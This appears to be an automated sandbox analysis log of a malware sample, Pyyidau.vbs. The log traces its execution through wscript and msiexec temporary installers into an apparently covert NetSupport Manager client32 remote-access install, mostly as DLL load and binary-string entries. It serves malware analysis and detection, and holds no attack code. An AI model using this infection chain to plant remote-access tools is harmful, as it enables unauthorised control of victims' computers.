                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: scrrun.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sxs.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                                Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: apphelp.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: shfolder.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: version.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: dwmapi.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: winmm.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: edgegdi.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: dbghelp.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: sspicli.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: dbgcore.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: netapi32.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: samcli.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: netutils.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: samlib.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edgegdi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: apphelp.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: shfolder.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: version.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: dwmapi.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: winmm.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: edgegdi.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: dbghelp.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: sspicli.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: dbgcore.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: netapi32.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: samcli.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: netutils.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: samlib.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeSection loaded: winmm.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeSection loaded: edgegdi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeSection loaded: dbghelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeSection loaded: dbgcore.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: apphelp.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: shfolder.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: version.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: dwmapi.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: winmm.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: edgegdi.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: dbghelp.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: dbgcore.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: sspicli.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: netapi32.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: samcli.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: netutils.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: samlib.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: uxtheme.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: ntmarta.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: msasn1.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: devrtl.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: spinf.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: drvstore.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: pciax.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: firewallapi.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: dnsapi.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: iphlpapi.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: fwbase.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: fwpolicyiomgr.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: firewallapi.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: dnsapi.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: iphlpapi.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: fwbase.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: fwpolicyiomgr.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: windows.storage.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: wldp.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: profapi.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: propsys.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: linkinfo.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: ntshrui.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: srvcli.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: cscapi.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: dwmapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: edgegdi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: uxtheme.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: ntmarta.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: client32provider.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: sspicli.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: apphelp.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: shfolder.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: version.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: dwmapi.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: winmm.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: edgegdi.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: dbghelp.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: dbgcore.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: sspicli.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: netapi32.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: samcli.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: netutils.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: samlib.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcicl32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: shfolder.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: mpr.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winmm.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wsock32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcp100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcr100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: activeds.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: netapi32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wininet.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcr100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: adsldpc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: samcli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wkscli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: edgegdi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dbghelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dbgcore.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wtsapi32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcichek.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: powrprof.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: umpdc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winsta.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: devobj.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcicapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: riched32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: riched20.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: usp10.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msls31.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: firewallapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: fwbase.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: fwpolicyiomgr.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: webio.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: websocket.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcicl32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: shfolder.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: mpr.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winmm.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wsock32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcp100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcr100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: activeds.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcr100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: netapi32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wininet.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: adsldpc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: samcli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wkscli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: edgegdi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dbghelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dbgcore.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wtsapi32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: uxtheme.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcichek.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winsta.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: devobj.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcihooks.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: textshaping.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: riched32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: riched20.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: usp10.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msls31.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pciinv.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msimg32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: oleacc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dwmapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: storeinvdll.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: windowscodecs.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: mfc100u.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msxml6.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: linkinfo.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: cscapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dxdiagn.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: d3d11.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: d3d12.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: powrprof.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winmmbase.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dxgi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wmiclnt.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: umpdc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: tapi32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winbrand.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: mswsock.dll
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                                Source: C:\Windows\SysWOW64\wscript.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Client32[1].ini
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dll
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                Source: Pyyidau.vbsStatic file information: File size 8816052 > 1048576
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: C:\Program Files (x86)\NetSupport\NetSupport Manager\MSVCR100.dll
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410f\ctl32\release_unicode\tcctl32.pdbP source: client32.exe, 00000020.00000002.115186233551.000000006C977000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: sfxcab.pdb source: Pyyidau.vbs.exe, 00000004.00000002.113968442877.000000000A0DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.113930238948.0000000001002000.00000040.00000400.00020000.00000000.sdmp
                                Source: Binary string: D:\NSLBuilds\NSM\NSM14Trunk\licgen\Release_unicode\Licence.pdb source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\NSLBuilds\NSM\NSM14Trunk\licgen\x64\Release\CloseHookApp64.pdb source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410f\ctl32\release_unicode\PCICTL.pdb source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Pyyidau.vbs.exe, 00000004.00000002.113967583372.0000000009590000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdb source: wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, MSIF373.tmp, 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp, MSIF373.tmp, 00000019.00000000.114135501778.0000000000619000.00000002.00000001.01000000.0000000C.sdmp, MSIF985.tmp, 0000001B.00000002.114157054506.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, MSIF985.tmp, 0000001B.00000000.114151145405.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, MSI1387.tmp, 0000001D.00000000.114217635476.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, MSI1387.tmp, 0000001D.00000002.114241895385.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, MSI23E6.tmp, 0000001F.00000002.114270824312.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp, MSI23E6.tmp, 0000001F.00000000.114259441382.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\x64\release_unicode\winst64.pdb source: winst64.exe, 0000001E.00000000.114225718112.00007FF679386000.00000002.00000001.01000000.00000010.sdmp, winst64.exe, 0000001E.00000002.114227744042.00007FF679386000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbpJD source: wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\nsmsrc\nsm1201f\kbfiltr\sys\objfre_wnet_amd64\amd64\nskbfltr.pdb source: winst64.exe, 0000001E.00000003.114226774436.00000000010E6000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wntdll.pdbUGP source: client32.exe, 00000021.00000002.115183991198.0000000006BF0000.00000040.10000000.00040000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114282443624.0000000002DF0000.00000020.00001000.00020000.00000000.sdmp
                                Source: Binary string: D:\nsmsrc\ReProcessWindowshortcuts\Release\ReProcessWindowshortcuts.pdb source: wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp
